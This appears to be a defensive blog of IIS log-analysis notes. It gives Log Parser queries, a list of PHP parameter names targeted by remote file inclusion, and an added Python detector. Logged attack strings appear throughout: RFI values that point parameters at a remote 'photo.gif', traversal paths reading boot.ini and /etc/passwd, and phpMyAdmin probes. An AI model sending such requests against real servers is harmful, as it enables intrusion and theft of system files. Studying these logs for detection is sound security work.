Variables used in RFI attacks
June 25, 2009
Variables used in RFI attacks:
&glob
&glob[rootDir]
AIbasedir
CLPATH
CMS_ADMIN_PAGE
CONFIG[MWCHAT_Libs]
CONFIG[path]
CONFIG_EXT[LANGUAGES_DIR]
CPG_M_DIR
Cat
Config_rootdir
DIR
DIR_LIBS
FM
GALLERY_BASEDIR
GLOBALS['mosConfig_absolute_path']
GLOBALS[AA_INC_PATH]
GLOBALS[CLPath]
GLOBALS[includeBit]
GLOBALS[language_home]
GLOBALS[mosConfig_absolute_path]
GLOBALS[rootdp]
G_PATH
HCL_path
HTTP_POST_VARS
IP
Include
LOCAL_PATH
LangCookie
MAIN_PATH
ME
PATH
PATH_Includes
PGV_BASE_DIRECTORY
PHORUM[settings_dir]
REX[INCLUDE_PATH]
Server
THEME_DIR
VoteBoxPath
[Home]
_AMGconfig[cfg_serverpath]
_AMLconfig[cfg_serverpath]
_AMVconfig[cfg_serverpath]
_CCFG[_PKG_PATH_DBSE]
_PX_config[manager_path]
_REQUEST
_REQUEST[option]
_SERVER[DOCUMENT_ROOT]
a
absolute_path
act
action
addpoll
adminpath
agendax_path
alpath
apa_module_basedir
app_path
appdir
archive
arquivo
azione
b2inc
baccio
base
baseDir
base_dir
base_path
basepath
bbPath
bbPath[path]
bkpwp_plugin_path
boarddir
c
cal_dir
cfgProgDir
chem_absolu
childwindow.inc.php?form
clarolineRepositorySys
classes_dir
client
cmd
cnkey
coID
component_dir
conf
confdir
config
configFile
config[image_module]
config[include_path]
config[path_admin_include]
config[path_src_include]
config[search_disp]
config_atkroot
configbasedir
cont
content
conteudo
cropimagedir
css_path
custom
cutepath
dPconfig[root_dir]
data
dept
dir[base]
dir[func]
do
dsp
emailreader_ini
eqdkp_root_path
error
f
ff_compath
fil_config
file
file_newsportal
filnavn
fromTemplate
from_market
function
g_meta_inc_dir
g_meta_include_file
glob[rootDir]
go
gorumDir
hc
inc
inc_dir
incdir
includeFooter
includePath
include_dir
include_file
include_location
include_path
includedir
includes_dir
inhalt
kietu[url_hit]
kobr
l
lang
language_dir
layerstyle
left
lg
libpach
libpath
lm_absolute_path
lng
logfile
login
lvc_include_dir
m2f_root_path
m
mainpage
match
meio.php
meio
mode
modpath
module_path]
module_root_path
mosConfig_absolute_path
mosConfig_live_site
myPath
name
newsSync_enable_phpnuke_mod
news_file
nic
noSet
no_connect
nphp_config[LangFile]
o
opcao
open
openfile
openid_root_path
option
ort
p
pag
page
pageurl
pagina
path[docroot]
path_local
path_pre
path_to_bt_dir
path_to_news
pathtoashnews
pg
phgdir
phpAds_path
phpEx
phpbb_root_dir
phpbb_root_path
phpc_root_path
pilih
pivot_path
place
pm_path
pollname
prefix
principal
pun_root
quezza_root_path
rage
relative_script_path
rep
req_path
returnpath
root
root_dir
root_path
rootagenda
rub
s
sayfa
sbp
script_root
seccion
sel
serverPath
server_inc
setmodules
settings[locale]
settings_dir
sfx
show
side
site
site_path
siteurl
smf_root_path
sourcedir
spaw_root
sqld
systempath
t
t_core_path
template
theme_path
thisdir
thispath
tpl_pgb_moddir
url
user_inc
val1
visualizar
vsDragonRootPath
vwar_root2
vwar_root
wkPath
wpPATH
x
xcomicRootPath
xoopsConfig[xoops_url]
xoops_redirect
Query to extract the variables:
logparser "SELECT * FROM 'C:\logs\*' where [cs-uri-query] like '%=http%'" -i:W3C -o:DATAGRID
Daily checks
May 13, 2009
HTTPERR
logparser "SELECT [cs-uri], COUNT(*) AS EXPR1 FROM 'C:\WINDOWS\system32\LogFiles\HTTPERR\*' GROUP BY [cs-uri] ORDER BY expr1 desc" -i:HTTPERR -o:DATAGRID
SMTP
logparser "SELECT [cs-uri-query], COUNT(*) AS EXPR1 FROM 'C:\WINDOWS\system32\LogFiles\A_smtp\SMTPSVC1\*' GROUP BY [cs-uri-query] ORDER BY expr1 desc" -i:W3C -o:DATAGRID
IIS
logparser "SELECT [cs-uri-stem], COUNT(*) AS EXPR1 FROM 'C:\WINDOWS\system32\LogFiles\W3SVC1\*' GROUP BY [cs-uri-stem] ORDER BY expr1 desc" -i:W3C -o:DATAGRID
More includes in different variables
May 8, 2009
Query to detect includes in variables:
SELECT [cs-uri-query], COUNT(*) AS EXPR1
FROM tabla
where (rutalog = 'c:\a\W3SVC1') and [cs-uri-query] like '%=http%'
GROUP BY [cs-uri-query]
ORDER BY 2 desc
Include in different variables:
mosConfig_absolute_path=http:///photo.gif?
phpbb_root_path=http:///photo.gif?
theme_path=http:///photo.gif?
dir=http:///photo.gif?
baseDir=http:///photo.gif?
config[path_src_include]=http:///photo.gif?
inc_dir=http:///photo.gif?
page=http:///photo.gif?
HCL_path=http:///photo.gif?
Boot.ini
May 8, 2009
Request for the boot file:
/????/????/????/boot.ini
Query:
SELECT [cs-uri-stem], [cs-uri-query]
FROM tabla
where [cs-uri-stem] like '%?%'
ORDER BY 1 desc
Passwd
May 8, 2009
Request for the system password file:
/????/????/????/etc/passwd
Query:
SELECT [cs-uri-stem], [cs-uri-query]
FROM tabla
where [cs-uri-stem] like '%?%'
ORDER BY 1 desc
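As an added example (not code from the original posts), this Python script does what the '%=http%' include query and the boot.ini / etc/passwd queries above do, but offline over a constructed W3C log: it reads the #Fields directive, flags any query parameter whose value is a remote URL (so it also catches parameter names that are not in the list), flags stems that contain '../', boot.ini or etc/passwd, and groups the hits the way the GROUP BY queries do. The log lines, hosts and addresses are constructed for the example.

```python
import re
from collections import Counter
from urllib.parse import parse_qsl

# Constructed IIS W3C extended log sample (documentation addresses only).
SAMPLE_LOG = """#Software: Microsoft Internet Information Services 6.0
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2009-05-08 10:01:02 203.0.113.5 GET /index.php mosConfig_absolute_path=http://203.0.113.9/photo.gif? 200
2009-05-08 10:01:03 203.0.113.5 GET /modules/news.php inc_dir=http://203.0.113.9/photo.gif? 404
2009-05-08 10:02:10 198.51.100.7 GET /cgi-bin/../../../boot.ini - 404
2009-05-08 10:02:11 198.51.100.7 GET /../../../../etc/passwd - 404
2009-05-08 10:03:00 192.0.2.20 GET /index.php page=home 200
"""

RFI_VALUE = re.compile(r"^(https?|ftp)://", re.IGNORECASE)
TRAVERSAL = re.compile(r"(\.\./|/etc/passwd|boot\.ini)", re.IGNORECASE)


def parse_w3c(text):
    """Yield one dict per request line, keyed by the names in the #Fields directive."""
    fields = []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#"):
            values = line.split()
            if fields and len(values) == len(fields):
                yield dict(zip(fields, values))


def classify(req):
    """Return 'rfi', 'traversal' or None for one parsed request."""
    query = req.get("cs-uri-query", "-")
    if query != "-":
        # parse_qsl also decodes %-encoded values, so http%3A%2F%2F is caught too.
        for _name, value in parse_qsl(query, keep_blank_values=True):
            if RFI_VALUE.match(value):
                return "rfi"
    if TRAVERSAL.search(req.get("cs-uri-stem", "")):
        return "traversal"
    return None


def suspicious_counts(text):
    """Count RFI hits per cs-uri-query and traversal hits per cs-uri-stem."""
    rfi, trav = Counter(), Counter()
    for req in parse_w3c(text):
        kind = classify(req)
        if kind == "rfi":
            rfi[req["cs-uri-query"]] += 1
        elif kind == "traversal":
            trav[req["cs-uri-stem"]] += 1
    return rfi, trav
```

Running `suspicious_counts(SAMPLE_LOG)` returns two counters whose `most_common()` output is the same ranking the ORDER BY ... desc queries produce in the DATAGRID.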
Phpmyadmin
May 7, 2009
Repeated entries in the logs:
/phpmyadmin/main.php
/phpMyAdmin/main.php
/myadmin/main.php
/phpmyadmin2/main.php
/PMA/main.php
/mysql/main.php
/db/main.php
Query:
select cs-uri-stem, count (*) as a from '\W3SVC1\W3SVC1\*.*' group by cs-uri-stem order by a desc
Unusual behaviour
May 4, 2009
List of everything that has happened on the server, ordered by date, to pick out unusual behaviour:
SELECT Date, [c-ip], [cs(Referer)], [cs-uri-stem], [cs-uri-query], [cs-uri]
FROM tabla
WHERE (Date > '2009-04-27')
ORDER BY Date
It is important to include cs-uri: it shows us the requests that were rejected and logged in HTTPERR.
SELECT Date, [cs(Referer)], [cs-uri-stem], [cs-uri-query]
FROM tabla
WHERE (Date > '2009-04-25')
ORDER BY Date
Where are they going?
May 4, 2009
They come from [cs(Referer)] and go to [cs-uri-stem], [cs-uri-query]
SELECT Date, [c-ip], [cs(Referer)], [cs-uri-stem], [cs-uri-query]
FROM tabla
WHERE (Date > '2009-04-27')
ORDER BY [cs(Referer)] DESC
Example:
30/04/2009 1:25:36 http://www.whois.sc/ /robots.txt -
28/04/2009 9:58:55 http://www.whois.sc/ /robots.txt -
They come from whois.sc and go to robots.txt
Where do they come from?
May 4, 2009
For the month that has just started:
SELECT [cs(Referer)], COUNT(*) AS EXPR1
FROM tabla
WHERE (Date > '2009-05-01')
GROUP BY [cs(Referer)]
ORDER BY [cs(Referer)] DESC